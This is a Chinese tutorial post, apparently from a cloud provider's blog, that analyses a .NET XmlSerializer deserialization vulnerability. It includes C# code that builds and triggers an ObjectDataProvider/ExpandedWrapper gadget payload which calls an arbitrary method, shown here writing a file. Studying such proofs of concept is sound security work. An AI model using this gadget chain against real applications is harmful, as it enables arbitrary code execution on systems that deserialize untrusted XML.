小编今天带大家了解.Net反序列化漏洞XmlSerializer的示例分析,文中知识点介绍的非常详细。觉得有帮助的朋友可以跟着小编一起浏览文章的内容,希望能够帮助更多想解决这个问题的朋友找到问题的答案,下面跟着小编一起深入学习“.Net反序列化漏洞XmlSerializer的示例分析”的知识吧。
条件:
初始化对象时,类型可控:new XmlSerializer(type可控)
反序列化对象时,输入内容可控:serializer.Deserialize(fi可控)
两个关键类:ObjectDataProvider, ExpandedWrapper
计算
安全
数据库
网络和加速
企业服务
//PresentationFramework.dll v4.0.0.0
System.Windows.Data.ObjectDataProvider
//System.Data.Services.dll v4.0.0.0
System.Data.Services.Internal.ExpandedWrapperPayload生成:
public static void serializeObjectWithXmlSer()
{
ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();
XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
eobj.ProjectedProperty0 = new ObjectDataProvider();
eobj.ProjectedProperty0.ObjectInstance = new Class2();
eobj.ProjectedProperty0.MethodName = "writeFile";
eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");
TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
serializer.Serialize(fo, eobj);
fo.Close();
}触发Payload:
public static void deserializeObjectWithXmlSer()
{
XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
ser.Deserialize(fi);
fi.Close();
}感谢大家的阅读,以上就是“.Net反序列化漏洞XmlSerializer的示例分析”的全部内容了,学会的朋友赶紧操作起来吧。相信亿速云小编一定会给大家带来更优质的文章。谢谢大家对亿速云网站的支持!
亿速云「云服务器」,即开即用、新一代英特尔至强铂金CPU、三副本存储NVMe SSD云盘,价格低至29元/月。点击查看>>
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
